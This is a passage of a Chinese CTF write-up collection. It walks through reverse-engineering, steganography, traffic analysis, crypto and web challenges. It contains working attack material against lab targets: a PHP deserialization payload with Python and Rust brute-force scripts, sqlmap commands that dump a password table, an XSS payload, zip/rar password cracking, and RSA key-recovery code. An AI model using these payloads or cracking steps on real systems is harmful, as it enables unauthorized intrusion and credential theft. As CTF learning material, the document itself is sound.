       14002a041 00              ??         00h
       14002a042 00              ??         00h
       14002a043 00              ??         00h
       14002a044 00              ??         00h
       14002a045 00              ??         00h
       14002a046 00              ??         00h
       14002a047 00              ??         00h
       14002a048 00              ??         00h
       14002a049 00              ??         00h
       14002a04a 00              ??         00h
       14002a04b 00              ??         00h
       14002a04c 01              ??         01h
       14002a04d 00              ??         00h
       14002a04e 00              ??         00h
       14002a04f 00              ??         00h
       14002a050 01              ??         01h
       14002a051 00              ??         00h
       14002a052 00              ??         00h
       14002a053 00              ??         00h
       14002a054 01              ??         01h
       14002a055 00              ??         00h
       14002a056 00              ??         00h
       14002a057 00              ??         00h
       14002a058 01              ??         01h
       14002a059 00              ??         00h
       14002a05a 00              ??         00h
       14002a05b 00              ??         00h
       14002a05c 01              ??         01h
       14002a05d 00              ??         00h
       14002a05e 00              ??         00h
       14002a05f 00              ??         00h
       14002a060 01              ??         01h
       14002a061 00              ??         00h
       14002a062 00              ??         00h
       14002a063 00              ??         00h
</code></pre>
<p>由于提示迷宫为5*5，把上面的数据每五个一组，得到下面的数据</p>
<pre><code>1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 0000 0000 1000
1000 1000 1000 1000 1000
</code></pre>
<p>在伪代码 sub_140001130()函数发现了</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608145330026.png" alt="image-20230608145330026" /></p>
<p>把后面的零去掉得到</p>
<pre><code>1 0 1 0 1    #左上0是迷宫入库，右上0是迷宫出口
1 0 1 0 1
1 0 1 0 1
1 0 0 0 1
1 1 1 1 1

#	 “	 !	  space
上	下	左	 右

得到
&quot;&quot;&quot;spacespace### =&gt;&quot;&quot;&quot;  ###
</code></pre>
<p>ghidra 看strings发现flag是迷宫的md5值</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606165635939.png" alt="image-20230606165635939" /></p>
<p>得到</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606170144258.png" alt="image-20230606170144258" /></p>
<p>flag{c4eb11b0e0a3cbeed7df057deaec18aa}</p>
<h2 id="just-serialize"><a class="header" href="#just-serialize">just serialize</a></h2>
<p>task.php</p>
<pre><code class="language-php">&lt;?php

show_source(__FILE__);
class Secret
{
    public $filename;
    public function __construct($filename)
    {
        $this-&gt;filename = $filename;
    }

    public function __toString()
    {
        $num = count(scandir($this-&gt;filename));
        if ($num &gt; 0) {
            return '什么也没有';
        } else {
            return 'flag_';
        }
    }
}

class Read
{
    public $text = '什么东西';

    public function __destruct()
    {
        echo $this-&gt;text;
    }
}

$a = unserialize($_GET['p']);
</code></pre>
<p>paylaod.php</p>
<pre><code class="language-php">&lt;?php
class Secret
{
    public $filename;
}
class Read
{
    public $text;
}
$a = new Read();
$b = new Secret();
$b-&gt;filename = &quot;glob://flag_xxskxnsknxakbsx.txt.*&quot;;
$a-&gt;text =$b;
echo &quot;\n&quot;;
echo serialize($a);
// O:4:&quot;Read&quot;:1:{s:4:&quot;text&quot;;O:6:&quot;Secret&quot;:1:{s:8:&quot;filename&quot;;s:33:&quot;glob://flag_xxskxnsknxakbsx.txt.*&quot;;}}
?&gt;
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">import requests
import string
from urllib.parse import quote

pwd = string.ascii_lowercase + string.digits

S = 'abcdefghijklmnopqrstuvwxyz0123456789.'

url = &quot;http://127.0.0.1:7777/task.php&quot;
payload = '?p=O:4:&quot;Read&quot;:1:{{s:4:&quot;text&quot;;O:6:&quot;Secret&quot;:1:{{s:8:&quot;filename&quot;;s:{}:&quot;{}&quot;;}}}}'
url += payload
if __name__ == &quot;__main__&quot;:
    flag = 'glob://flag_'
    while len(flag)&lt;40:
        for i in S:
            tmp = flag + i + '*'
            r = requests.get(url.format(len(tmp), tmp))
            if 'flag_' not in r.text[-50:]:
                flag += i
                break
        print(flag)
</code></pre>
<p>exp.rs</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span> use crate::http;
    pub fn just_serialize(){
        let alphabet = &quot;abcdefghijklmnopqrstuvwxyz0123456789.&quot;;
        let url = &quot;http://127.0.0.1:7777/task.php&quot;;
        let mut flag = &quot;glob://flag_&quot;.to_string();
        while flag.len() &lt; 50 {
            for i in alphabet.chars(){
                let temp = format!(&quot;{}{}*&quot;,flag,i);
                let url = format!(&quot;{}?p=O:4:\&quot;Read\&quot;:1:{{s:4:\&quot;text\&quot;;O:6:\&quot;Secret\&quot;:1:{{s:8:\&quot;filename\&quot;;s:{}:\&quot;{}\&quot;;}}}}&quot;,url,temp.len(),temp);
                let r = http::get(&amp;url).expect(&quot;&quot;);
                if !r.1.ends_with(&quot;flag_&quot;) {
                    flag.push(i);
                    break;
                }
            }
            println!(&quot;{}&quot;,flag);
        }
    }
<span class="boring">}</span></code></pre></pre>
<h2 id="流量分析实战"><a class="header" href="#流量分析实战">流量分析实战</a></h2>
<p>filter http 发现 有两个可疑文件</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608170605207.png" alt="image-20230608170605207" /></p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608170545618.png" alt="image-20230608170545618" /></p>
<p>导出这两个php</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608171015744.png" alt="image-20230608171015744" /></p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608171049710.png" alt="image-20230608171049710" /></p>
<h1 id=""><a class="header" href="#"><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230608171116488.png" alt="image-20230608171116488" /></a></h1>
<p>复制粘贴到01editor 保存为demo.zip</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230609122944950.png" alt="image-20230609122944950" /></p>
<p>破解得到密码为hackerme8888 解压得到flag.txt</p>
<p>flag{2c094ea0-088c-440e-b6da-472e1bec6239}</p>
<h2 id="spiral-螺旋矩阵"><a class="header" href="#spiral-螺旋矩阵">spiral 螺旋矩阵</a></h2>
<p>已知图片spiral.png</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/spiral.png" alt="spiral" /></p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230609154832720.png" alt="image-20230609154832720" /></p>
<p>解密base64得到：</p>
<p>flag{fake_flag} But RGBA色彩空间缺一不可哦~ 我教你还原:aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI=</p>
<pre><code>echo aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI= | base64 -d
</code></pre>
<p>https://blog.csdn.net/GW_wg/article/details/120406192</p>
<p>根据图片得到了图片加密的代码task.py</p>
<pre><code class="language-python">def function(n):
    matrix = [[0] * n for _ in range(n)]
    number = 1
    left, right, up, down = 0, n - 1, 0, n - 1
    while left &lt; right and up &lt; down:
        # 从左到右
        for i in range(left, right):
            matrix[up][i] = number
            number += 1

        # 从上到下
        for i in range(up, down):
            matrix[i][right] = number
            number += 1

        # 从右向左
        for i in range(right, left, -1):
            matrix[down][i] = number
            number += 1

        for i in range(down, up, -1):
            matrix[i][left] = number
            number += 1
        left += 1
        right -= 1
        up += 1
        down -= 1
    # n 为奇数的时候，正方形中间会有个单独的空格需要单独填充
    if n % 2 != 0:
        matrix[n // 2][n // 2] = number
    return matrix
</code></pre>
<p>写出下面的代码exp.py</p>
<pre><code class="language-python">from PIL import Image

def spiral_order(matrix):
    if not matrix:
        return []
    result = []
    while matrix:
        result.extend(matrix.pop(0))
        if matrix and matrix[0]:
            for row in matrix:
                result.append(row.pop())
        if matrix:
            result.extend(matrix.pop()[::-1])
        if matrix and matrix[0]:
            for row in matrix[::-1]:
                result.append(row.pop(0))
    return result

def reconstruct_image(image_path):
    # 打开图片
    image = Image.open(image_path)
    # 转换为RGBA模式
    image_rgba = image.convert(&quot;RGBA&quot;)
    # 获取图片像素数据
    pixel_data = list(image_rgba.getdata())
    # 获取图片宽度和高度
    width, height = image.size
    # 将像素数据重新排列为二维矩阵
    matrix = [pixel_data[i * width:(i + 1) * width] for i in range(height)]
    # 获取螺旋矩阵还原后的像素顺序
    spiral_order_pixels = spiral_order(matrix)
    # 创建新的图片对象
    new_image = Image.new(&quot;RGBA&quot;, (width, height))
    new_image.putdata(spiral_order_pixels)
    # 显示图片
    new_image.show()
    # new_image.sage(&quot;new.png&quot;)

# 示例用法
reconstruct_image(&quot;spiral.png&quot;)
</code></pre>
<p>把代码形成的new.png 用stegsolve打开</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230609155622535.png" alt="image-20230609155622535" /></p>
<p>在alpha通道得到了密码：mUv8vvGRMNK5mgbxPNsH</p>
<p>用密码解压得到flag</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230609160056361.png" alt="image-20230609160056361" /></p>
<h1 id="ichunqiuctf"><a class="header" href="#ichunqiuctf">IchunqiuCTF</a></h1>
<h2 id="quoted-printable"><a class="header" href="#quoted-printable">Quoted-printable</a></h2>
<pre><code>1.unzip file and open .txt copy text code
2.use quoted_printable_cli -d text to decode
flag{那你也很棒哦}
</code></pre>
<h2 id="zero_one"><a class="header" href="#zero_one">zero_one</a></h2>
<pre><code>ctf-party &quot;01001100011010010011000&quot; from_bin
</code></pre>
<h2 id="rsa"><a class="header" href="#rsa">RSA</a></h2>
<pre><code>1.use rsa.py get d
</code></pre>
<h3 id="wieners-rsa-attack"><a class="header" href="#wieners-rsa-attack">Wiener’s RSA Attack</a></h3>
<pre><code class="language-python">import gmpy2
import libnum

def continuedFra(x, y):
    &quot;&quot;&quot;计算连分数
    :param x: 分子
    :param y: 分母
    :return: 连分数列表
    &quot;&quot;&quot;
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf
def gradualFra(cf):
    &quot;&quot;&quot;计算传入列表最后的渐进分数
    :param cf: 连分数列表
    :return: 该列表最后的渐近分数
    &quot;&quot;&quot;
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # 这里的渐进分数分子分母要分开
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator
def solve_pq(a, b, c):
    &quot;&quot;&quot;使用韦达定理解出pq，x^2−(p+q)∗x+pq=0
    :param a:x^2的系数
    :param b:x的系数
    :param c:pq
    :return:p，q
    &quot;&quot;&quot;
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
    &quot;&quot;&quot;计算列表所有的渐近分数
    :param cf: 连分数列表
    :return: 该列表所有的渐近分数
    &quot;&quot;&quot;
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf


def wienerAttack(e, n):
    &quot;&quot;&quot;
    :param e:
    :param n:
    :return: 私钥d
    &quot;&quot;&quot;
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d


n= 68781015120012754009149819243839432182753699533745468739333557116438115901358573880902197723852823949505376140916570536753019491036629572363854637530919546688901226752085109196549145599781909847664046508960094447692268230516763088293911965638780888720788954194778424857089535187609738198309161969913567107861
e= 54093680529782962282616750547542407544796590039913570980901028264103594185617926725669901283009540557359666956131385125727959502505561517117179644650419753631214251337533961664493198676862110639584202010794500844074619335752668896589407110076134931918634061631574656816488381501901503924226166074238518619869
c= 30443384983816710270001651296607959522389400057103143909277631290995899073895621701281106228069835965181342091582584186637031613250922961166298411359757600825556083868477673357860585539016515776933117915504873987178857740106223631465737111746470236003857656528610755145017342412306680097140732745012583119076

d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
</code></pre>
<h2 id="windows系统密码"><a class="header" href="#windows系统密码">Windows系统密码</a></h2>
<pre><code>1. open https://www.bejson.com/enc/md5dsc/ decode MD5
2.can get good-luck
</code></pre>
<h2 id="二维码"><a class="header" href="#二维码">二维码</a></h2>
<pre><code>1. cat qr_code.png 发现了4number.txt，还有一些PK值，敏感想到可能隐藏了一个zip压缩包(zip的创始人名字简写为PK)和4number.txt文件
2. binwalk qr_code.png 结果如下，检测出图片中存在压缩包
3. foremost qr_code.png 分离压缩包 进入output 文件夹 有加密的 00000000.zip
4. fcrackzip -b -c 1 -l 4-4 -u 00000000.zip 找到密码为7639 打开.txt 有flag
flag{vjpw_wnoei}

1. hexdump -C qr_code.png
2. binwalk -e qr_code.png 分离压缩包
3. cd qr_code.png.extrackted
4. zip2john 1d7.zip &gt;&gt; hash
5. john hash --show
flag{vjpw_wnoei}
</code></pre>
<pre><code># 隐藏
# hidden.txt是要隐藏的文件, demo.jpg是用来隐藏信息的图片, out.jpg是有隐藏信息的图片
outguess -k &quot;my secret key&quot; -d hidden.txt demo.jpg out.jpg
# 提取
outguess -k &quot;my secret key&quot; -r out.jpg hidden.txt

# 隐藏数据 To embed emb.txt in cvr.jpg
steghide embed -cf cvr.jpg -ef emb.txt
# 提取数据 To extract embedded data from stg.jpg
steghide extract -sf stg.jpg

</code></pre>
<h2 id="stxxhxxx"><a class="header" href="#stxxhxxx">stxxhxxx</a></h2>
<pre><code>flag:ctf{welcom_to_upc_im}

1. steghide extract -sf stxxhxxx.jpeg
2. cat info
</code></pre>
<h2 id="rar"><a class="header" href="#rar">rar</a></h2>
<pre><code>use  rust buuctf::solutions::fcreack_rar().await; to force crack password
</code></pre>
<h2 id="dangerous-rsa"><a class="header" href="#dangerous-rsa">Dangerous RSA</a></h2>
<pre><code class="language-python">def Dangerous_RSA():
	e = 0x3
	n = 0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdadbfb7bdd65670a589a4d2478e9adcafe97c6ee23614bcb2ecc23580f4d2e3cc1ecfec25c50da4bc754dde6c8bfd8d1fc16956c74d8e9196046a01dc9f3024e11461c294f29d7421140732fedacac97b8fe50999117d27943c953f18c4ff4f8c258d839764078d4b6ef6e8591e0ff5563b31a39e6374d0d41c8c46921c25e5904a817ef8e39e5c9b71225a83269693e0b7e3218fc5e5a1e8412ba16e588b3d6ac536dce39fcdfce81eec79979ea6872793
	c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365

	k = 0
	while 1:
		res = iroot(c+k*n,e)  #c+k*n 开3次方根 能开3次方即可
		#print(res)
		#res = (mpz(13040004482819713819817340524563023159919305047824600478799740488797710355579494486728991357), True)
		if(res[1] == True):
			print(libnum.n2s(int(res[0]))) #转为字符串
			break
		k=k+1

Dangerous_RSA()
</code></pre>
<h2 id="rsa-flagenc-pubkey"><a class="header" href="#rsa-flagenc-pubkey">RSA flag.enc pub.key</a></h2>
<pre><code class="language-bash">1. openssl rsa -pubin -in pub.key -text -modulus
2. convert to decimal n = int(&quot;C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD&quot;,16)
3. factordb 86934482296048119190666062003494800588905656017203025617216654058378322103517
4. p = 285960468890451637935629440372639283459
5. q = 304008741604601924494328155975272418463
6. e = 65537

import gmpy2
import rsa
n = int(&quot;C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD&quot;,16)
p = 285960468890451637935629440372639283459
q = 304008741604601924494328155975272418463
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open(&quot;./flag.enc&quot;, &quot;rb+&quot;) as f:
    f = f.read()
    print(rsa.decrypt(f, key))

flag{decrypt_256}
</code></pre>
<h2 id="这个压缩包有点麻烦"><a class="header" href="#这个压缩包有点麻烦">这个压缩包有点麻烦</a></h2>
<pre><code class="language-sh">fcrackzip -b -c 1 -l 6-6 -u attachment.zip =&gt;483279
open windows crack by password-note.txt and 解压flag.zip
bkcrack -C flag.zip -c README.txt -p README.txt
bkcrack -C flag.zip -c flag.jpg -k 060fd5e1 d1f696b7 12655d8d -d flag =&gt;生产flag图片
binwalk flag =&gt;发现有zip
binwalk -e flag =&gt;提出4FC5.zip
imhex 4FC5.zip =&gt;用imhex清除伪密码 14 00 09 改为14 00 00
unzip 4FC5.zip =&gt;可以看到flag
</code></pre>
<h2 id="lsbhacking"><a class="header" href="#lsbhacking">lsbHacking</a></h2>
<pre><code class="language-sh">#solution1
java -jar Stegsolve.jar
open image
data analis
select 0
and save bin flag.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode

#solution2
zsteg flag11.png
zsteg flag11.png -E b1,rgb,lsb,xy &gt; flag1.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
</code></pre>
<h2 id="眼见非实"><a class="header" href="#眼见非实">眼见非实</a></h2>
<pre><code class="language-sh">mv zip z.zip
unzip z.zip
binwalk -e 眼见非实.docx
mv 眼见非实.docx yan.zip
unzip yan.zip
open extreated folder with code search flag
</code></pre>
<h2 id="t0p_gear"><a class="header" href="#t0p_gear">T0p_Gear</a></h2>
<pre><code class="language-sh">https://www.cnblogs.com/ms-study/p/13201030.html
</code></pre>
<p>#@ add user for archlinux WSL and login</p>
<pre><code class="language-sh">wsl.exe -d Arch login
user_name:andrew
password:dnr..

# open /etc/sudoers add that
nano /etc/sudoers
andrew ALL=(ALL) ALL
</code></pre>
<h2 id="use-steghide"><a class="header" href="#use-steghide">use steghide</a></h2>
<pre><code>#显示信息
steghide info demo.png
zsteg -a demo.png
</code></pre>
<h2 id="这是类"><a class="header" href="#这是类">这是类</a></h2>
<pre><code class="language-python">#  strings AppletMain.class
s = &quot;\u0066\u006c\u0061\u0067\u007b\u0033\u0034\u0038\u0034\u0066\u0038\u0033\u0061\u002d\u0066\u0062\u0035\u0033\u002d\u0034\u0062\u0038\u0031\u002d\u0061\u0033\u0061\u0037\u002d\u0064\u0038\u0062\u0064\u0031\u0039\u0032\u0036\u0036\u0062\u0062\u0033\u007d&quot;
decoded_s = bytes(s, &quot;utf-8&quot;).decode(&quot;unicode_escape&quot;)
print(decoded_s)
# flag{3484f83a-fb53-4b81-a3a7-d8bd19266bb3}
</code></pre>
<h2 id="我藏起来了"><a class="header" href="#我藏起来了">我藏起来了</a></h2>
<pre><code class="language-bash">css_remove_display_none
zsteg im.png
flag{72a8c48e-5bb0-40ef-b3f0-5543c3b16dfd}
</code></pre>
<h2 id="gif提取隐藏信息"><a class="header" href="#gif提取隐藏信息">gif提取隐藏信息</a></h2>
<pre><code class="language-sh">convert new_gif.gif -coalesce xx_%05d.png
一个一个看形成的图片能够得到flag
</code></pre>
<h2 id="棋盘密码上古神器"><a class="header" href="#棋盘密码上古神器">棋盘密码,上古神器</a></h2>
<pre><code class="language-bash">“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”
</code></pre>
<p>https://www.qqxiuzi.cn/bianma/qipanmima.php</p>
<h2 id="flow_analysis"><a class="header" href="#flow_analysis">flow_analysis</a></h2>
<pre><code class="language-sh">#convert pcapng to pcap
tshark -F pcap -r ctf.pcapng -w newfile.pcap
</code></pre>
<p>getsqlinjection.py</p>
<pre><code class="language-python">import urllib
import pyshark
cap_file = '/run/media/andrew/HIKVISION/CTF/ichunqiu_ctf/flow_analysis/ctf.pcapng'
cap = pyshark.FileCapture(cap_file, display_filter='http  &amp;&amp; ip.addr == 192.168.61.140 &amp;&amp; ip.addr == 192.168.61.1')

is_http_request = 'is_http_request'
http_request = []
blind_attack_success = []
for i in range(len([_ for _ in cap])):
    check = getattr(cap[i].http, 'time', is_http_request)
    if check != is_http_request:
        if float(cap[i].http.time) &gt; 3:
            for j in range(i, 0, -1):
                if cap[j].frame_info.number == cap[i].http.request_in:
                    http_request.append((cap[j].frame_info.number, cap[j]))
                    http_request.append((cap[i].frame_info.number, cap[i]))
                    blind_attack_success.append(urllib.parse.unquote(cap[j].http.file_data))
                    print(cap[j].frame_info.number)
                    print(cap[j])
                    print(urllib.parse.unquote(cap[j].http.file_data))
                    # input()
                    print(&quot;----&quot;)
                    print(cap[i].frame_info.number)
                    print(cap[i])
                    print(&quot;----&quot;*3)
                    break

with open('output.txt', 'w') as f:
    f.writelines('\n'.join(blind_attack_success))
</code></pre>
<p>getasciicode.py</p>
<pre><code>file_path = 'output.txt'
with open(file_path, 'r') as f:
    lines = f.readlines()

ascii_digits = [ _.split('=')[2].split(',')[0] for _ in lines]
ascii_letters = ''.join([chr(int(_)) for _ in ascii_digits])
print(ascii_letters)
</code></pre>
<h2 id="new-swan-stone-castle"><a class="header" href="#new-swan-stone-castle">New Swan Stone Castle</a></h2>
<pre><code class="language-bash">sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot;
sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot; --current-db
sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot; -D sql100510013 --tables
sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot; -D sql100510013 -T password --columns
sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot; -D sql100510013 -T password -C id --dump
sqlmap -u &quot;http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1&quot; --prefix &quot;%22%29&quot; suffix &quot;%23&quot; -D sql100510013 -T password -C pwd --dump
</code></pre>
<h2 id="万国码"><a class="header" href="#万国码">万国码</a></h2>
<pre><code class="language-bash">file:///usr/share/webapps/cyberchef/index.html#recipe=Unescape_Unicode_Characters('%5C%5Cu')
decode unicode &quot;\u0049\u0063\u0068\u0075\u006e\u0071\u0069\u0075\u007a\u006e\u007a\u006c&quot;
enter value get flag
</code></pre>
<h2 id="考考小李"><a class="header" href="#考考小李">考考小李</a></h2>
<pre><code class="language-bash">'&gt;&lt;script&gt;alert(xx)&lt;/script&gt;
把上面的提交能够得到flag
flag{608837f4-bbc5-464c-99ab-7b44016d1ee9}
</code></pre>
<h2 id="回旋13踢"><a class="header" href="#回旋13踢">回旋13踢</a></h2>
<pre><code class="language-bash">xw4n73qm23z rot13
enter value get flag
</code></pre>
<h2 id="隐藏的编码"><a class="header" href="#隐藏的编码">隐藏的编码</a></h2>
<pre><code class="language-bash">adslkjadsl a ,zmxnc,zmc,zxcopaweqwk;l;l;l;l;l;l;l;l;l;l;l;ldkm,ZGY1czRh==.zxmczxkchzxkhiqewupipsad;l;l;l;l;l;l;l;l;l;l;l;l
base64 -d ZGY1czRh==
enter value get flag
</code></pre>
<h2 id="致敬经典"><a class="header" href="#致敬经典">致敬经典</a></h2>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>//看图片应该是凯撒加密 分析秘钥发现有偏移6，ASCII code 为偶数时右偏移6，奇数时左偏移6
fn caesar_cipher_decode_uniqe(text: &amp;str, shift: u32) -&gt; String {
    println!(&quot;{}&quot;,text);
    let mut result = String::new();

    for c in text.chars() {
        match c {
            'a'..='z' =&gt; {
                let mut ascii_code = c as u8;
                if ascii_code %2 !=0{
                    ascii_code+=6;
                }else{
                    ascii_code-=6;
                }
                if ascii_code&gt;'z' as u8{
                    ascii_code = ascii_code - ('z' as u8)+('a' as u8)-1;
                }
                result.push((ascii_code) as char);
            }
            'A'..='Z' =&gt; {
                let mut ascii_code = c as u8;
                if ascii_code %2 !=0{
                    ascii_code+=6;
                }else{
                    ascii_code-=6;
                }
                if ascii_code&gt;'Z' as u8{
                    ascii_code = ascii_code - ('Z' as u8)+('A' as u8)-1;
                }
                result.push((ascii_code) as char);
            }
            _ =&gt; result.push(c),
        }
    }
    println!(&quot;{}&quot;,result);
    result
}
caesar_cipher_decode_uniqe(&quot;lrua{1uy3yj9l-yw9u-48j2-uuj8-36h03706y7u7}&quot;,6);
<span class="boring">}</span></code></pre></pre>
<h2 id="xor-签到题"><a class="header" href="#xor-签到题">xor 签到题</a></h2>
<pre><pre class="playground"><code class="language-rust">fn main() {
    let file = include_bytes!(&quot;xor GAME.txt&quot;).to_vec();
    let key = &quot;GAME&quot;.as_bytes().iter().map(|s|s.to_owned()).collect::&lt;Vec&lt;u8&gt;&gt;();
    let new_file = xor(file,key);
    println!(&quot;{}&quot;,String::from_utf8_lossy(&amp;new_file));
}
fn xor(vec:Vec&lt;u8&gt;,key:Vec&lt;u8&gt;)-&gt;Vec&lt;u8&gt;{
    let mut new_file = vec![];
    for f in 0..vec.len(){
        let ff= vec.get(f).unwrap()^key.get(f%key.len()).unwrap();
        new_file.push(ff);
    }
    new_file
}</code></pre></pre>
<pre><code class="language-python">with open(&quot;xor GAME.txt&quot;,&quot;r&quot;) as f:
    bytes = f.read()
    game = &quot;GAME&quot;
    flag = []
    for i in range(len(bytes)):
        new_b = ord(str(bytes[i]).encode('utf-8')) ^ ord(game[i%len(game)].encode('utf-8'))
        flag.append(chr(new_b))
    print(&quot;&quot;.join(flag))
</code></pre>
<h2 id="crymisc"><a class="header" href="#crymisc">CryMisc</a></h2>
<pre><code class="language-python">import pyminizip
pyminizip.compress(r&quot;jiami.py&quot;,&quot;&quot;,r&quot;jiami.zip&quot;,&quot;&quot;,0)

#用AZPR明文破解
AESencrypt.py 可以得到
n = int(&quot;48D6B5DAB6617F21B39AB2F7B14969A7337247CABB417B900AE1D986DB47D971&quot;,16)=32945885482421841602167475970472000545315534895409154025267147105384142461297
factordb 32945885482421841602167475970472000545315534895409154025267147105384142461297

import gmpy2
import rsa
n = 32945885482421841602167475970472000545315534895409154025267147105384142461297
p = 177334994338425644535647498913444186659
q = 185783328357334813222812664416930395483
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open(&quot;./message.encrypted&quot;, &quot;rb+&quot;) as f:
    f = f.read()
    print(rsa.decrypt(f, key))
</code></pre>
<h2 id="pintu"><a class="header" href="#pintu">PINTU</a></h2>
<pre><code class="language-python">from PIL import Image
import os

# create a new image size of 4000x2000 pixels and black background
pic = Image.new('RGB',(4000,2000),(0,0,0))

# list all image files
img_list = os.listdir('./img')

for i in range(len(img_list)):
    print(&quot;./img/{}&quot;.format(img_list[i]))
    # read image and reads the width and height of the image from the file header
    f = open(f'./img/{img_list[i]}','rb').read()
    w,h = f[6],f[8]

    img = Image.open(f'./img/{img_list[i]}')
    # create image with 32 columns and 18 rows
    pic.paste(img,(32*w,18*h))
pic.save(&quot;all_image.png&quot;)
</code></pre>
<h2 id="tiger"><a class="header" href="#tiger">tiger</a></h2>
<pre><code class="language-sh">cat png-key.txt | rot47 decode
conda activate py27
python lsb.py extract key.png-stego.png gen.txt 28a217fe
cat gen.txt
unzip -Z flag_1.zip
bkcrack -C flag_1.zip -c information.txt.txt -p information.txt.txt
bkcrack -C flag_1.zip -c flag -k 968eae79 e129f7a6 43893e7a -d flag
qrcli decode flag.png &gt; zero.txt
https://yuanfux.github.io/zero-width-web/ decode content
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
https://www.guballa.de/vigenere-solver decode vigenere
flag{866d3755-c358-5119-abeb-bda666a8099d}
</code></pre>
<h2 id="外太空的秘密"><a class="header" href="#外太空的秘密">外太空的秘密</a></h2>
<pre><code class="language-python">print(&quot;q1:{}&quot;.format(pow(9,9)))
s=['A','C','G','T','R','N','D','E','G']
cnt=0
for i in range(9):
    for j in range(9):
        for k in range(9):
            for m in range(9):
                for n in range(9):
                    for o in range(9):
                        for p in range(9):
                            for q in range(9):
                                for r in range(9):
                                    _str=s[i]+s[j]+s[k]+s[m]+s[n]+s[o]+s[p]+s[q]+s[r]
                                    cnt+=1
                                    if _str=='AAAARNDEG':
                                        print(&quot;q2:{}&quot;.format(cnt))
                                    if cnt==1001:
                                        print(&quot;q3:{}&quot;.format(_str))

</code></pre>
<h2 id="rsa256"><a class="header" href="#rsa256">rsa256</a></h2>
<pre><code class="language-python">openssl rsa -pubin -in public.key -text -modulus
e = 65537
int(&quot;00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705&quot;,16)
factordb 87982816287542607821348020319142008042005562918106976160430773236821410039557
p=274473488606178722897600533120866465659 q=320551236967671239609994506214257226623


import gmpy2
import rsa
n = int(&quot;00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705&quot;,16)
p = 274473488606178722897600533120866465659
q = 320551236967671239609994506214257226623
e = 65537
phin = (q-1)*(p-1)
